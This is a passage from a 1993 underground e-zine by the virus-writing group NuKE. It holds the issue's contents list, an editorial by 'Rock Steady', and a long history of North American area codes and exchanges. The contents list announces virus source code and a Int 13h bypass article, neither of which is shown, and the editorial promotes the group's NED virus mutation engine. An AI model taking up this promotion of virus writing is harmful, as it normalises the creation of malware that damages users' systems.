NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE uK E- KE NuKE Informational Journal -N E- Volume 1 Issue #6 Nu -N May 1993 uK Nu KE uK (C) Copyright NuKE, 1992, 1993 E- KE NuKE is a trademark registered to NuKE Inc., which is a legally -N E- registered company name in Canada & The United States of America Nu -N uK NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE Volume 1, Issue 6, May 1993 NuKE Info-Journal #6 Article Topic/Titles ~~~~~~~~~~~~~~~~~~~~ 000. This Article............................................................ 001. Introduction to the "NEW" NuKE and NuKE Activities...................... 002. A Guide to the North American Numbering System.......................... 003. National Computer Security Association (NCSA) Cover Report.............. 004. Interactive Realtime Information Service (IRIS) Guide................... 005. Programming the Floppy Disk Controller & the DMA Chip to bypass Int 13h. 006. The Varicella Virus Source Codes........................................ 007. The `Arms Race' on Disk-Based Protection Methods : Round One............ 008. The `Arms Race' on Physical Protection Devices : Round Two.............. 009. AT&T Talk Tickets: Hacker's Heaven? Maybe............................... 010. Mafia, Incorporated. Underworld extends its reach....................... 011. Rivest, Shamir, Adleman, (RSA) Encryption............................... 012. `Clipper Chip' State-of-the-Art Encryption or State-of-the-Art Backdoor. 013. Lies, Scandals and Roomers of the Anti-Virus Community.................. Thanks to NuKE Contributors/Supporters (in alphabetical order) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Aristotle..............(USA) Dr.X...................(Canada) Also Farewell To FireCracker............(USA) ~~~~~~~~~~~~~~~~ Ford Fairlane..........(Sweden) Tormentor & DY.......(Sweden) Lloyd..................(Sweden) (Good-bye Tormentor and your group Ned239.................(USA) Demoralized Youth, it was an honour Nereus.................(USA) to chat amongst thyselves. Thanx for Nowhere Man............(USA) the constructive criticism, good Prozen Doberman........(Australia) luck in the future. Pure Energy............(Canada) Rock Steady/NuKE ) Rock Steady............(Canada) Savage Beast...........(Switzerland) Screaming Radish.......(Australia) Shindaq Arl'hur........(Australia) Silent Shadow..........(Canada) TaLoN..................(Australia) The Dark Elf...........(Australia) The Weird One..........(Australia) Throbbing Grisle.......(USA) Uli....................(Switzerland) Viper..................(USA) H O W T O C O N T A C T N U K E ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Cybernetic Violence BBS....514-426-9194 v32B NuKE WHQ (*NEW NUMBER*) Black Axis.................804-599-4152 v32B USA NuKE HQ Realms of Choas.........+61-XX-ASK-NUKE Dual Australia NuKE HQ Enigma E:N:U:N..........+41-22-340-0329 v32B European NuKE HQ Please note that "Cybernetic Violence" BBS will under go a NEW Phone number Starting May 29th, 1993. Please take note of the phone number, and remember to call the new number on/after May 29th, 1993. The above are free access systems, please feel free to contact the closest one to you. Signed, NuKE Members/Supporters =============================================================================== ================================================================================ Volume 1, Issue 6, May 1993 NuKE Info-Journal #6 NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE uK E- KE "Introduction to the `New' NuKE and NuKE -N E- Activities" Nu -N uK Nu By the Editor, KE uK Rock Steady E- KE -N E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu % Introduction % Welcome to the sixth issue of this Informational Journal. With regards to what goes on in the `modem world' utterly known as CyperSpace, NuKE has undergone several changes and recommendations in order to un-cloud the thoughts and impressions, the public has towards NuKE. I do wish to make it clear that there has been TWO unique gatherings of a computer group called `NuKE'. The original founded by The Darkman, whom now left the scene. And the seconded created by myself, Joseph Greco aka Rock Steady. I wish to state out, I simply relived the NuKE name, old members with The Darkman were evicted out of this New NuKE founded by myself, along with Nowhere Man, Phrozen Doberman and Screaming Radish. % What does this NuKE do? % We are _not_ a copious group of computer virus programmers. Surely, we set a few eminent examples that dominated the so-called `virus scene'. And surely we have created ingenious creations that have pressured many others to `mimic' our moves. How lethargic and bleak can some group/person get, if they (the so-called virus groups) have to imitate _us_ whom are here simply for the gain of self-knowledge? Frankly we are not solely a virus group, nor `teens' for that matter. We understand that all the existing `so-called' virus groups are kids/teens, and therefore can understand where such a label can originate from. The computer industry has opened a channel of unlimited information, a gain for self-knowledge advancements. We members/supporters of NuKE only wish to advance by self-knowledge advances and perhaps educate those that wish to be educated. We need to educate the world, no more secrets, it is the only way we can succeed in this world. And for this we are labelled as a computer criminals. Why is it wrong to want to learn how a computer functions internally? Why is it wrong to show you possible loops and holes that can make a computer system vulnerable to unauthorised access. There is a different class of society here in the computer world. A class that can obtain knowledge at alarming rates. A class that seeks and lives on information. A class that wishes to try out new ideas, and experiment others in order to advance intellectually. And yet the public wishes to suppress this minority group that can be even classified as ingenious. Surely we must not mistake those that have a destructive intent into this category. For I find that this type of disfigured character must be plucked out just like a cancerous cell at its early cellular growth. So what does NuKE do? Together we learn, and together we experiment. I wish to bring out the fact that every article here, has undergone extensive research, none of it is `second-hand' news. We will not take a `Michelangelo disassembly' when the exact recreation exist. We will not talk about `Anti-Debugger' routines when the exact article/examples have been seen in a text file publicly floating around the Technodrome. We will not `mimic' anyone, or try to `look' better than they, for the purpose that this is not a game of fame. NED was an exceptional toolkit made in October 1992, that started with the idea of the Dark Avenger's MtE. NED is now publicly available today, with it's SOURCE CODES, and surely enough we will see _many_ "mimic-kids" producing their own based on our trend, and make inarticulate claims that their engine was created solely by they. Simply looking at NED will influence your style of programming. Some unknown author in an unknown United States `so-called' virus group, has already recreated a shroudy example, that structurally looks exactly like N.E.D. Anyhow, it's up to you, the reader, to proclaim theses jokers out. We will not cloud our opinions with any emotional hatred to anyone or group. We believe in publishing works that are original, or state an original opinion, or fact. The NEW NuKE is undergoing dramatic changes in order to help with our overall impression. The New NuKE has even made major attempts to legalize itself by registering its name. However we are still undergoing through this legalization procedure, but do stay in tuned with the next Informational Journal issued out mid-July 1993, which will contain our registered company name, and number. Along with an official mailing address, (PO Box) registered to the NuKE name. NuKE has already made attempts to branch itself into Internet. As we may feature a open access unix (*NIX) site, we certainly will have a mail link to send/receive UUCP mail to our WHQ BBS. (Cybernetic Violence). % Ahhhh, We're on the Net % I certainly cannot guaranty something in the making, but UUCP/Usenet connection is a _very_ possible feature in the near future. I will not toy with you, I will say simply that we are in the process of transforming our system(s), and looking at all possible Unix based systems. It does look like that our choice will be between 386BSD or Linux 0.99.7A, which feature the TCP/IP protocols to establish a link with Internet, if that is to happen. Indeed, a Usenet feed will be made, if our budget does not meet with Internet connection fees. We currently have polled two 386/33Mhz PCs remotely, with a total disk space of 700 Megs and with a CD-ROM to run the software off directly (Linux), all with three 14.4k V32Bis modems and one 14.4k HST based modem. It will seem that we will feature an opened Unix system. We find free informational groups such as NuKE should be hooked up to perhaps, what is the biggest international network today. It certainly will cut down on long distance toll charges, which seem to hover at $500.00 monthly, hitting about $6000.00 yearly. This is Canadian Dollars, however take into grant that Canadian long distance calls are much more cheaper compared to our USA counter part. A one hour call originating from Canada to the United States will cost $15.00 (Can$). Where the USA counter part will pay closer towards $20.00 (US$), about $25.00 (Can$). The same does apply for international calls, which tend to cost more if originating from the USA. All in all, taking the currency exchange rate into account, that $6000.00 (Can$) translates to $7000.000 (Can$) if originated from the USA. I leave you to read the NuKE Informational Journal #6. If you do have any comments that you wish to send to the Editor, Rock Steady, please do so. If you wish to email me concerning a private matter, we feature Rock Steady's personal public key. -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.2 mQCNAiv/nIAAAAEEAKuoCTNG4Ahwp9vsdc7FL7PpFEc/oss29OF30v44wNZ3Qwxh uBrqjUOrRJyx3oLV3qrofaJG9BZp2u6NUpo0wTUOQHf0lUt/WWENbYdCYdFfz+Yt x6XoGgKY5M/S2LEUOaDT48ye/E9VzW5bXg0if5fKnqpD7j+e/E0EOTLgG0HDAAUR tB5Sb2NrIFN0ZWFkeSBvZiBOdUtFIFBHUCBLZXkgIzE= =In5p -----END PGP PUBLIC KEY BLOCK----- % What's to come, of NuKE? % ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This Informational journal sure was `bad' timing. All to be explain in due time, of course. But we did prolong this journal for quite a long while, due to many, many more articles we wanted to publish. Unfortunately, time stands still for no-one, not even for NuKE. We gathered enough information for another Informational Journal, but the articles were somewhat incomplete, to our standards. We received several articles from guest writers concerning Cellular Phones, Radio Communications, and other bits and pieces. If anyone has any additions or experiences for these topics, please do confront us. We await to see you soon... ================================================================================================================================================================ Volume 1, Issue 6, May 1993 NuKE Info-Journal #6 NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE uK E- KE "A guide to the North American Numbering -N E- System" Nu -N uK Nu By KE uK Nowhere Man E- KE -N E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu % Introduction % ~~~~~~~~~~~~~~~~ Recently it was announced that the final available area code (under the current area code format), 610, has been appropriated for use in southeastern Pennsylvania. With this change, all standard area codes for the North American phone system have been exhaused. While the final cutover to 610 will not be for another year, this is a landmark for our phone system. In response to this announcement, I've decided to release various information which I've been gathering about the North American phone system to the general public. I hope everyone finds it of interest. Please note that this article assumes that you know nothing about the North American phone system, so readers from the United States and Canada may find some of the information I present to be rather obvious (what 411 and 911 are, for example, or how various calls are placed by a customer); please bear with me for the benefit of those in Europe, etc., as there's some (in my opinion) very interesting information that I've uncovered about out telephone network. % Background % ~~~~~~~~~~~~~~ The North American phone network is the oldest in the world, yet also uses some of the most modern techniques and equipment. Unlike the majority of phone networks, which cover individual countries, the North American phone system covers the United States, Canada, and most of the Caribbean islands (such as Puerto Rico, Barbados, and so on). While calls between various countries on the North American system are generally billed at international rates, they are dialed like any other long-distance call. The entire North American phone system is assigned the country code +1; hence, it is often refered to officially as "World Zone One." World Zone One is further divided into area codes (three digits), which cover larger regions (states, provinces, etc.), exchanges, also three digits, which cover towns or small parts of a larger city, and subscriber-loop numbers (four digits), which identify a given customer in each phone exchange. Together, these form a ten-digit phone number -- unlike many areas, North American assigns ten digit numbers to everyone, regardless of location (in contrast, the U.K. uses two-or-three digit city codes, an optional exchange [for larger towns] of up to three digits, and four digit subscriber numbers). % Organization of area codes % ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The de-facto standards bureau for North America's phone network is Bell Communications Research Inc. (Bellcore). Bellcore was formed by AT&T after it's divestiture in 1984 and provides technical and research support to regional holding companies. Bellcore maintains common standards for the telephone systems, ensures a smoothly operating telecommunications netowork, and coordinates operations during national emergencies. Bellcore assignes all area codes and guides other aspects of the telephone numbering scheme. Area codes, known as Numbering Plan Areas (NPAs) in North America are presently of the form N0X or N1X where N represents a number between two and nine, and X is any number between zero and nine; however, area codes ending in -00 or -11 are reserved for special purposes (see below), and are therefore currently unavailable. Originally, central office (exchange) codes were in the form NNX, which distinguished them from area codes, as only area codes had a zero or one in the second digit. However, with increased demand for phone numbers, most exchanges have changed to the NXX format (ie. the second and third digits of an exchange code can be any number, zero to nine). Naturally this presents problems, as exchanges whose seconds digit is one or zero are now indistinguishable from NPAs. As a result, most areas use "one-plus" dialing: to make a long-distance call you dial one plus the area code plus the local number. Area codes were initially assigned in 1947, with at least one being assigned to each American state and Canadian provice and several being assigned to more populous ones -- in all 86 NPAs were originally assigned. Currently the only exceptions to this "one or more NPAs per state" are in Canada, where 902 serves both Nova Scotia and Prince Edward Island, area 819 covers the eastern Northwest Territories as well as part of Quebec, and area 403 covers Alberta, Yukon and the western Northwest Territories; in addition, the 809 area code covers many locations throughout the Caribbean, from Puerto Rico to the Bahamas to the Virgin Islands to Jamaica. (Note: Midway Island and Wake Island, two U.S. posessions in the Pacific Ocean have just been added to area code 808 [Hawaii]. Prior to this time, they were not direct dialable.) The original proposal suggested that the 86 area codes be assigned in a semi-regular pattern (for example, Canada would have been 915, 914, 913, 916, 917, 918, 919, 910 from east to west by province). This plan was modified to eliminate the confusion caused by "similar" area codes adjacent to each other. A state initially assigned a single area code would have zero for it's NPAs middle digit, while a state with more than one area NPA would have a one as a middle digit. Areas where more inward calls were expected (major metropolitan areas like New York City) received "short pull" area codes like 212, because the dialing time would be shorter (remember, this was in the days of rotary phones) and the mechanical switching equipment would be tied up for shorter periods. For example, New York City received 212 (a total of five pulses), while Chicago and Los Angeles, the next two most populous areas in the U.S., received 312 and 213 (six pulses each), respectively. This went all the way on down to NPA 809, the Caribbean, which required 27 clicks of the rotary dial and would presumably be dialed least frequently. Of course, with the dominance of DTMF dialing, a region's NPA is no longer significant... (As a side note, New Jersey was originally given the area code 201, the smallest [numerically] area code, because Bellcore is headquartered there.) Since the initial assignment, there have been numerous area code splits, where certain telephone exchanges are removed from an area code and placed into a new code. Since 1980 there have been at least twenty such splits. The first split occured in the early 1950s, and the final split will occur when 610 is created in 1994. In the U.S., NPAs were further subdivided into LATAs (Local Access Transport Areas) after the breakup of AT&T in 1984. Before this time, there was no real definitation of what was local and what was long-distance; in order to be fair to communities on state borders, etc. (imagine paying LD charges to call five miles away!), LATAs were created that encompassed "populated areas with common calling needs." All calls made within a LATA are handled by the common local telephone company (New York Telephone, Pacific Bell, Illinois Bell, etc.), which currently subscribers cannot choose (this will probably change in the next few years), while all calls between LATAs are handled by a customer-chosen long-distance carrier (AT&T, MCI, Sprint, etc.) and are subject to federal regulation. A LATA may cover a small area or a whole state; they are usually contained within one NPA, but may cover several (e.g. the Chicago LATA covers all of area codes 312 and 708). As of 1991 there were 196 LATAs (and I believe this will not change). Canada does not currently have a LATA system, though it may soon develop one. LATAs are assigned codes, but these are only for billing purposes, and are not dialed by the customer; in fact, LATAs are transparent to the caller, except for routing/billing purposes. Direct Distance Dialing (the ability to place long-distance calls without going through an operator) first was implemented on November 10, 1951 in Englewood, New Jersey, USA, though it was not wide-spread until the 1960s. There was early use of 11X+ codes for long-distance dialing, but eventually 1+ long-distance dialing became standard. As stated, area codes were assigned in 1947, five years before anyone would need one. Why was it done? I'm not sure. It can only be assumed this was done for 1) future planning and 2) the operators' benefit. (Another odd thing is that 0+ [operated-assisted] dialing became available in 1960, almost ten years after direct-dialing was introduced. Why did they bother? Beats me.) Surprisingly enough, a few tiny areas within the United States and Canada are *still* not direct dialable, but they're in remote regions. This includes some isolated ranches in the Texas desert (Bar J Ranch, Double B Ranch, etc.), bordellos and truck stops in Nevada desert areas (Amargosa, Corncreek, etc.), and some wilderness towns in California within the U.S., and remote resorts in Ontario (Kingfisher Lake and Deer Lake, for example) and isolated arctic villages in the Yukon and NWT (Redknife, Taglu, etc.), in Canada. These areas must be serviced via radiophone, so an operator is required. % Non-standard area codes % ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Certain area codes are not available for normal purposes. These can be generally subdivided into two categories: "Service Access Codes" (SACs), NPAs ending in -00, or "11" services, NPAs ending in -11. Service Access Codes are employed like normal access codes (and are dialed normally), but are not assigned to customers in any one geographic area. Rather, SACs are used for Wide-Area Telephone Service (WATS) by business. Currently, only four SACs are employed, and only three can be dialed by normal customers at the present. 600 ~~~ The 600 NPA is currently reserved for Canadian TWX systems (see below) and ISDN usage. To my knowledge, it is not dialable by normal customers. (In fact, I've seen it used in TV shows for 800 numbers like 555 is used for local numbers [ie: call 1-600-FLO-WERS for a fake flower company, since the real 1-800-FLO-WERS already belongs to FTD Florists, who would probably not appreciate hundreds of crank calls tying up their business line].) 700 ~~~ 1-700 numbers are used for Group Access Bridging (GAB) lines: teleconferencing, EasyLink 700 service, chat lines, etc. (Note the cute little acronym...who says Bell doesn't have a sense of humour?) The most famous 700 service is Alliance Teleconferencing from AT&T, but there are many other chat lines available to those with lots of money to burn. The 700 exchange is also used for AT&T EasyLink 700 service, where a customer gets a phone number that can be rerouted to any phone he visits. For example, if a businessman is traveling around the country, at each hotel he stays at he can dial up an 800 number, enter his phone number and PIN, then the current phone number, and all calls to his EasyLink number ring on the phone line he entered; now the office always knows which number he can be reached at. In addition to GAB/EasyLink services, the 700 NPA is sometimes used to allow intra-LATA calls to be placed via your long-distance carrier. By dialing 1-700-NXX-XXXX you are really calling NXX-XXXX but being billed by your long-distance company instead of the local telco. Not all LD services offer this, though (AT&T, for one, does not, but Telecom*USA does). To find out if this is available from your carrier, either call the long-distance operator, or try calling yourself via the 700 NPA (if it's busy [or your call-waiting beeps] you can use the 700 area; or, you can call your other line, if you have one, or a friend to test this out). 800 ~~~ 800 service was pioneered by AT&T in the 1960s and has since become a world standard, with most countries adopting the 800 area code for toll-free dialing. 1-800 numbers are used by businesses, and, increasingly, residential customers, as a service to clients (or, in the case of home users, to college students, truck drivers, and others who need to call home a lot) -- the business decides which areas it wants to provide 800 access in (home state/province only, nearby states/provinces, a whole region of the country, a whole country, U.S. and Canada, or even international, all at increasing cost), and people in those areas who call the 800 number are not billed for the call: the business is. Each 800 number maps to a normal phone number, and the caller is billed normally for the call, however just before the bill is totaled, any 800 calls are removed from the bill and instead billed to the 800 line's owner. The owner of the 800 line pays a startup charge, a monthly fee, and a fee for every fraction of an hour that the line is in use. (Note that as of May 1, 1993 800 phone numbers belong to the business that operates the line and *not* the phone company. This is a step towards the day where every customer will get a permanent phone number no matter where they move, which company they use, etc. This also means that long-time customers are finally free to leave AT&T without losing their old phone numbers...) Before 800 service, local businesses could provide toll-free service with "Zenith Numbers" (ie. ZEX-XXXX under the exchange- name system). Since "Z" isn't on the phone dial, the caller had to have an operator place the call, which was then billed to the business. (This service is still in use in Canada.) 900 ~~~ 1-900 numbers are infamous as kinky phone sex lines, rip-off astrological recordings, etc.; however 900 service is actually much like 800 service... Nothing about 1-900 service dictates that the caller be charged for the call (though he invariably is) -- the key difference between 800 and 900 service is that 900 lines have much higher call-handling capacity (some 900 lines can receive hundreds of thousands of calls at once without jamming!). In addition, 900 service allows the provider to make the caller pay a portion of the charges. As a result, 900 lines have become pay-per-call lines, where the user is charged $0.25-$50.00 plus per-minute costs to listen to pre-recorded messages, chat one-on-one with some cheap whore, etc. The other group of special "area codes" are the N11 series of NPAs. These numbers are not true NPAs, but rather numbers that Bell has assigned to certain key services (police/fire, directory assistance, etc.) as a service to customers -- you just dial the three digits (or 1+ the three digits in some areas), and the call is quickly completed. The -11 codes include: 011 ~~~ 011 is the international dialing prefix in World Zone One. (Unlike most of the rest of the world, which uses 00 for overseas calls, North America uses 011.) 211 ~~~ This code is no longer in service (to my knowledge), but in "the old days," before Direct Distance Dialing (ie. pre-1960s), 211 called up the AT&T long-distance operator, who would place your long-distance call for you. Naturally, this is no longer needed (operator-assisted calls are placed via the long-distance operator at 00), so 211 is generally not used in most areas (in a few NPAs 211 is a ringback). 411 ~~~ 411 reaches local directory assistance (as if you dialed 555-1212). This operator only gives numbers within your NPA (sometimes in neighbouring NPAs, too); to find a number in a different area you have to dial NPA-555-1212. 511 ~~~ 511 is generally unused, though in a few places it is used for ringback. 611 ~~~ 611 reaches your local telephone company's repair office. You provide the man/lady with your error, and for an outragous fee ($1.15/minute in my area), they'll send out a lineman to (hopefully) find and correct the problem. 711 ~~~ The 711 code is not always available, and it's actions depend on where you live -- in British Columbia, for example, 0+711 is used for mobile service, while in Illinois 711 reaches the emergency bureau as if you dialed 911 (see below). In a few areas 711 is the ringback number. 811 ~~~ In some areas 811 dials the local telco's business office. This code was more universal in the past, as now most areas have moved the business office to a 1-800 number (leaving 811 unused). 911 ~~~ The world-famous 911 code calls up a special emergency center where your call is processed and forwarded on to the appropriate agency (police, fire department, ambulance, etc.). The 911 operators automatically receive your name, phone number, address and other information when you call (computers and ANI do the magic), so be wary of trying to mess with this service (not a good idea anyway, as 911 performs a valuble public service). 911 is not available in all areas (mostly rural areas), so this code isn't universal. % Unusual area codes % ~~~~~~~~~~~~~~~~~~~~~~ At one time, several area codes were used for non-standard purposes. These deserve some special attention. Area codes ending in -10 used to be TWX (TeletypeWriter eXchange) area codes. (TWX was an old system used in the days before faxes and modems. Teletypewriters communicated similar to terminals -- a person on the transmitting end would type a message, and a printer on the receiving end would print it out. This is how telegrams were sent.) TWX area codes were not normally dialable from a regular phone, to my knowledge, and were reassigned to regular telephone service as the demand for new NPAs increased and TWX service was eliminated (around 1990). The TWX NPAs served the following regions: 410 - United States, northeastern region 510 - United States, east of Chicago 610 - Canada [now located at NPA 600] 710 - United States, southeastern region 810 - Mexico 910 - United States, from Chicago westward The other set of area codes that deserves mention are the Mexico access numbers. Mexico is not integrated into World Zone One, and is assigned the country code +52. However, a large number of calls are placed to Mexico from North America, so in the days before International Direct Distance Dialing was universal, AT&T assigned three special NPAs for Mexico. These were not NPAs in the true sense: they mapped to Mexican city codes and local numbers. In addition, they were not dialable from outside of the U.S. and Canada. By 1990 IDDD was available from everwhere in North America, so on February 1, 1991 the codes were released for use as true area codes. These codes were as follows: 706 - Northwest Mexico (Tijuana area) [now northern Georgia] 903 - Southwest Mexico (Guadalajara area) [now northeast Texas] 905 - Mexico City area [soon to be southern Ontario] As you might have noticed, these numbers convieniently map to Mexican phone numbers: 706 was really for 70-6X-XXXXXX, 903 was for 90-3X-XXXXXX, and 905 was for 90-5-XXX-XXXX. All of these map to ten digits, an NPA and local number in World Zone One... The 909 area code was used at one time for the Telenet Communications Data Network, now known as SprintNet. When area codes became scarce, Bell took back the area from Telenet, giving it an "interchangeable" area code instead (see below); I'm not sure which area they received. 909 was chosen, naturally, because it takes the longest ammount of time of any area code to dial on a rotary phone (28 clicks). Since Telenet was to be used by computers, which had TouchTone dialing, this didn't matter... 909 is now being used by Riverside and San Bernadino Counties in southern California (formerly part of the 714 area). Finally, what about the 710 area code? 710 is reserved for telephone company and U.S. government purposes, but little is known beyond that. It *cannot* be dialed from a normal telephone. Most operators deny its existance. Which agencies use it? Why? Is this NPA for special "secured lines?" Is it even used at all? If anyone has more information about this area code, please let me know. % Area code statistics % ~~~~~~~~~~~~~~~~~~~~~~~~ Which states/provinces have the most area codes? Here are the top five: 1. California, USA -- 13 2. New York, USA/Texas, USA -- 9 3. Illinois, USA -- 6 4. Ontario, Canada/Pennsylvania, USA -- 5 5. Florida, USA/Ohio, USA/Michigan, USA -- 4 (Note: After 416 splits, Ontario will be tied with Illinois for 3rd place with six area codes each; Michigan will move up to number four with five NPAs when 313 finally splits. At least ten states and one province have three NPAs.) Which area codes have the most exchanges in them? The top ten are: 1. 212 (New York, USA) -- 705* 2. 205 (Alabama, USA) -- 693 3. 919 (North Carolina, USA) -- 691* 4. 313 (Michigan, USA) -- 688* 5. 416 (Ontario, Canada) -- 680* 6. 215 (Pennsylvania, USA) -- 665* 7. 602 (Arizona, USA) -- 657 8. 206 (Washington, USA) -- 649 9. 708 (Illinois, USA) -- 644 10. 713 (Texas, USA) -- 636 (Note: Starred exchange numbers mean that the NPA is scheduled for a split by 1994 [212 is moving some exchanges to 718 right now].) Which area codes have the fewest exchanges? The top ten are: 1. 807 (Ontario, Canada) -- 105 2. 906 (Michigan, USA) -- 117 3. 302 (Delaware, USA) -- 129 4. 413 (Massachusetts, USA) -- 135 5. 401 (Rhode Island, USA) -- 141 6. 307 (Wyoming, USA) -- 171 7. 607 (New York, USA) -- 176 8. 719 (Colorado, USA) -- 179 9. 802 (Vermont, USA) -- 181 10. 506 (New Brunswick, Canada) -- 182 (Note: 917 [New York pager/celluar service] was omitted because it is growing too fast... It had 104 exchanges as of January, but by April is had 124. By now it surely has more. Besides, I don't like to consider it a real area anyway.) (All exchange data is from April 15th, 1993, so this may have changed by now.) Which area codes have the most unlisted numbers? Well, nine out of the top ten area codes are in California. While most people would probably quickly attribute this to the infamous "California" attitude, it's most likely due to the fact that Pacific Bell offers the lowest rates for unlisted numbers ($0.30/month in California, compared to $1.50/month in Chicago, $1.88/month in New York, and $4/month in Idaho). The ten NPAs with the most unlisted numbers (in percent of total numbers) are: 1. 702 (Las Vegas, Nevada, USA) -- 64.6% 2. 209 (Freson, California, USA) -- 63.1% 3. 213 (Los Aneles, California, USA) -- 61.7% 4. 510 (Oakland, California, USA) -- 61.6% 5. 408 (San Jose, California, USA) -- 60.2% 6. 916 (Sacramento, California, USA) -- 59.8% 7. 909 (Riverside, California, USA) -- 57.7% 8. 818 (Anaheim, California, USA) -- 57.1% 9. 619 (San Diego, California, USA) -- 56.5% 10. ??? (Bakersfield, California, USA) -- 55.2% Finally, which areas were considered "the most important" when area codes were handed out; in other words, which areas were assigned the NPAs which required the fewest number of clicks on a rotary phone? The top five are: 1. New York City -- 5 2. Chicago/Los Angeles -- 6 3. Dallas/Detroit/Pittsburgh -- 7 4. Philadelphia/St. Louis/Boston/Austin -- 8 5. Cleveland/Syracuse/Milwaukee/Minneapolis -- 9 (This assumes the original area codes as assigned in the fifties, ie. 212 covers all of New York City, etc.) % Assignment of exchanges % ~~~~~~~~~~~~~~~~~~~~~~~~~~~ When the telephone was first introduced, central-office operators sat at switchboards, completing connections in response to spoken requests. There were few enough phone lines so the operator simply knew where to plug in for the call. That began to change during an outbreak of the measels in Lowell, Massachusetts, in 1879. The town doctor, feared that if all four operators fell ill, their substitutes would have trouble connecting people unless every line got a number. The idea quickly caught on. In the 1880s telephone service quadrupled in the nation's settled areas. Cities soon had not only a central office and phone numbers but exchanges in other parts of town, so callers now asked for Main or Central plus the subscriber's several-digit number. Branch exchanges usully took their names from their relative geography, street names, or names of neighborhoods. Bell devised phonetic tests to help make sure only easily understood names were chosen. When neighborhood and street names started to run out, the Bell System recommended new names, like Evergreen, Lakeside, Poplar, and Walnut. By the time dialed calling was introduced in the Bell System in 1921 the exchange name were so ingrained that Bell Telephone kept them on. William G. Blauvelt of AT&T had divided the alphabet into groups of three letters for each of the dial's openings in 1917. Z was omitted because, well, it was the last letter; that left an odd letter to eliminate. It came down to Q and X, the two most infrequent letters in English, but Bell finally decided to keep X, since Q could only be followed by U, limiting the number of possible exchange names. And because a single phone-number pulse could be transmitted when the receiver lifted or the finger wheel was jarred, no calls would be initiated until a pulse signal of at least two was received; thus the number one got no letters attached to it. Dialing swept the nation, but only large cities used exchange name dialing; in small towns one still had only to dial a three- or four-digit number. (As a side note, why was it that subscriber numbers were never more than four digits? It's a carry-over from the early days before direct dialing. It was determined that an operator could not reach more than 10,000 plugs without getting up from her seat...) Seven-digit numbers became standard only after World War II. New York City had pioneered them in the early 1930s when it began inserting an "exchange-designation number" after the two-letter exchange prefix (for example, you used to dial RA6-9999 for the RAndolph exchange in Chicago, with six as the "exchange-destination number"). By the mid-1950s all other major cities were converted to this system, replacing such combinations as Chicago's three letters and four digits, Cleveland's two letters an four digits, and Dallas's one letter and four digits. In 1961 Bell Telephone announced that it would phase out exchange name dialing city by city. Pittsburgh and Cincinnati began converting in 1962; Philadelphia and Seattle were the last to change, in 1978. The classic combiation of two letters and five numbers was a fully national standard for less than a decade. The two-letter-five-number system was also used in Canada, though I'm not sure how widely. Vancouver, British Columbia was one city to use this system, though I don't how many others did. (Anyone have any information about this?) All-number calling was introduced for several reasons. Mainly there weren't enough workable letter combinations. Exchanges like 571 had stayed unavailable because letters like JKL (5) and PRS (7) wouldn't combine. All-number calling also eliminated hard-to-spell exchanges, prevented mix ups between similar leters and numbers like O and 0, and made possible direct dialing from Europe and other parts of the world, where most phones never had letters on their dials. For the benefit of those outside of North America, I have included a diagram of how our phone pads are layed out and which letters are assigned to which key: ÚÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄ¿ ³ 1 ³ 2 ³ 3 ³ ³ ³ ABC ³ DEF ³ ÃÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄ´ ³ 4 ³ 5 ³ 6 ³ ³ GHI ³ JKL ³ MNO ³ ÃÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄ´ ³ 7 ³ 7 ³ 8 ³ ³ PRS ³ TUV ³ WXY ³ ÃÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄ´ ³ * ³ 0 ³ # ³ ³ ³ OPER ³ ³ ÀÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÙ (Note: the zero key is marked "OPER" because dialing zero will summon the local operator. Zero and one have no letters officially assigned to them. Some people like to claim that one is "Q" and zero is "Z", but I have never seen one or zero used in that fashion before.) Each area code has certain exchanges set aside for special purposes. These exchanges are: 555 ~~~ Local directory assistance. Dialing NPA-555-XXXX will get you directory assistance for the given area. This is why most phone numbers in movies and TV shows are 555-XXXX or KLondike-5 XXXX... People whose numbers were used in movies, etc. complained to the studios after getting hundreds of calls from losers asking for James Bond or whatever. (One family's phone number appeared on the cover of a heavy metal album and is now suing the band after receiving thousands of threatening phone calls from fans.) This use of 555-XXXX is purely a voluntary thing; a long time ago Bell was able to reserve certain exchanges throughout the country that producers could safely use, but with a shortage of telephone exchanges they had to stop this practice. 950 ~~~ Used to access other long-distance services. This is called Feature Group B equal access. To use the service you call their 950 number (which is a free call), then enter your multi-digit PIN, then dial the number you wish to call. Almost all areas now have Feature Group D service (Equal Access), where you select an alternate carrier and then use it normally, like you used to use AT&T (ie. just dial 1-NPA-NXX-XXXX). Currently 950s are only used in the U.S., but they are reserved for future use in Canada and will probably soon be utilized, given the recent Unitel decision. Currently Canadian callers must use local dialups for independent long-distance carriers (called Feature Group A, long phased out in the United States). (In the U.K. Mercury uses a similar setup. Mercury phones are equiped to pulse dial 131, enter the customer's ten-digit PIN touch-tone, then enter the number they're trying to call, all automatically. This is sort of like 950 access...) 958 and 959 ~~~~~~~~~~~ These exchanges are usually reserved for plant testing. In some areas they may be used for normal service. In most areas other exchanges are used for testing, too. 976 ~~~ 976 numbers are like local 1-900 numbers. They are billed on a per-minute basis, but are usually much less expensive than 900 calls (not more than a dollar or two at most per minute). 976 can usually be blocked (like 900 